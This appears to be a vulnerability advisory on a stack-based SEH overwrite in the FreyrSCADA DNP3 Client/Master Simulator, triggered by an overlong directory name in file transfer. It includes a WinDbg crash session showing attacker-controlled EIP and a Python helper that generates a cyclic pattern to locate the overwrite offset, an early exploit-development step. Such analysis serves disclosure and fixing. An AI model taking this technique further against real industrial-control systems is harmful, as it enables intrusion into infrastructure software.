When file transfer support is enabled, the simulator does not bound the length of a directory name supplied through the DNP3 file transfer feature. An overly long name overwrites stack memory, including the structured exception handler record: in the WinDbg session below the first access violation occurs while dereferencing edx, which already holds the filler value 0x41414141, !exchain shows the SEH record overwritten with the same value, and after continuing execution EIP itself becomes 0x41414141. The !exploitable classification is heuristic, but attacker-controlled EIP is confirmed directly by the register dump.
0:001> g
ModLoad: 76000000 76083000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 72860000 728b8000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 74f80000 74fbc000 C:\Windows\system32\mswsock.dll
ModLoad: 74ad0000 74ad5000 C:\Windows\System32\wshtcpip.dll
(a40.6c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=032cfefc ebx=01cd5240 ecx=00000000 edx=41414141 esi=00000002 edi=032cfe60
eip=0046d618 esp=032cfd44 ebp=032cfd54 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe -
FreyrDNPClientSim!Unit9Finalize+0x33614:
0046d618 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
0:004> !exchain
032cfeb8: 41414141
Invalid exception stack at 41414141
0:004> g
(a40.6c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=774371cd esi=00000000 edi=00000000
eip=41414141 esp=032cf818 ebp=032cf838 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???
0:004> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlRaiseStatus+0x00000000000000b4 (Hash=0x3c79292c.0x49336407)
Access violations at the instruction pointer are exploitable if not near NULL.
0:004> lmvm FreyrDNPClientSim
start end module name
00400000 007dd000 FreyrDNPClientSim C (export symbols) C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Loaded symbol image file: C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Image path: C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Image name: FreyrDNPClientSim.exe
Timestamp: Sat Feb 08 21:24:49 2020 (5E3F8991)
CheckSum: 00000000
ImageSize: 003DD000
File version: 21.4.22.0
Product version: 21.4.22.0
File flags: 2 (Mask 3F) Pre-release
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: FreyrSCADA
ProductName: DNP3 Client / Master Simulator - Demo
InternalName: FreyrDNPClientSim.exe
OriginalFilename: FreyrDNPClientSim.exe
ProductVersion: 21.04.022
FileVersion: 21.4.22.0
FileDescription: DNP3 Client Simulator - Demo
LegalCopyright: ©2020, www.freyrscada.com, All Rights Reserved
LegalTrademarks: FreyrSCADA
Comments: DNP3 Client / Master Simulator - Demo
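The following helper triages a WinDbg transcript like the one above and prepares the next step of the analysis. It is an added example, not code from FreyrSCADA or from the original advisory. It parses the register and !exchain lines (the sample below is copied from the session above and embedded as constructed input), reports which values hold the 0x41 filler byte, and generates a Metasploit-style cyclic pattern so that, once the "A" filler is replaced with it, the crash value can be mapped back to the exact offset of the SEH record in the directory name. The function names, the filler byte and the pattern length are assumptions of this example.

```python
"""Crash triage for an SEH overwrite seen in WinDbg (added example, not vendor code)."""
import re
import string

# Constructed sample: lines copied from the WinDbg session on this page.
WINDBG_DUMP = """\
0:004> !exchain
032cfeb8: 41414141
Invalid exception stack at 41414141
0:004> g
(a40.6c0): Access violation - code c0000005 (first chance)
eax=00000000 ebx=00000000 ecx=41414141 edx=774371cd esi=00000000 edi=00000000
eip=41414141 esp=032cf818 ebp=032cf838 iopl=0 nv up ei pl zr na pe nc
"""

# x86 general-purpose registers as printed by the WinDbg "r" style dump.
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bsi]p)=([0-9a-f]{8})")
# "record_address: handler" lines printed by !exchain.
EXCHAIN_RE = re.compile(r"^([0-9a-f]{8}): ([0-9a-f]{8})$", re.M)


def parse_registers(dump):
    """Return {register: value} for the register lines in the transcript."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def parse_exchain(dump):
    """Return [(record_address, handler_address)] pairs from !exchain output."""
    return [(int(a, 16), int(h, 16)) for a, h in EXCHAIN_RE.findall(dump)]


def is_filler(value, byte=0x41):
    """True when all four bytes of a 32-bit value are the filler byte (0x41 = 'A')."""
    return all(((value >> shift) & 0xFF) == byte for shift in (0, 8, 16, 24))


def triage(dump, filler=0x41):
    """Summarise which control-flow values were overwritten by the filler."""
    regs = parse_registers(dump)
    chain = parse_exchain(dump)
    return {
        "eip_controlled": is_filler(regs.get("eip", 0), filler),
        "seh_handler_controlled": any(is_filler(h, filler) for _, h in chain),
        "tainted_registers": sorted(r for r, v in regs.items() if is_filler(v, filler)),
    }


def cyclic_pattern(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: uppercase, lowercase, digit triplets.

    Every 4-byte window is unique within the full 20280-byte pattern, so a
    crash value read from EIP or the SEH record maps to exactly one offset.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=20280):
    """Offset of a crash register's little-endian bytes inside the pattern, or -1."""
    return cyclic_pattern(length).find(value.to_bytes(4, "little"))


if __name__ == "__main__":
    result = triage(WINDBG_DUMP)
    print(result)
    # 0x41414141 is plain 'AAAA' filler, so it cannot be located in the pattern;
    # rerun the crash with cyclic_pattern(n) as the directory name and feed the
    # new EIP / handler value to pattern_offset() to find the SEH record offset.
    print(pattern_offset(0x41414141))
```

Replacing the "A" filler with the cyclic pattern on the next run turns the two overwritten values (the handler address and, if the record's next pointer is also covered, the value that lands in EIP) into offsets inside the directory name, which is what a fix or a proof of concept needs before anything else.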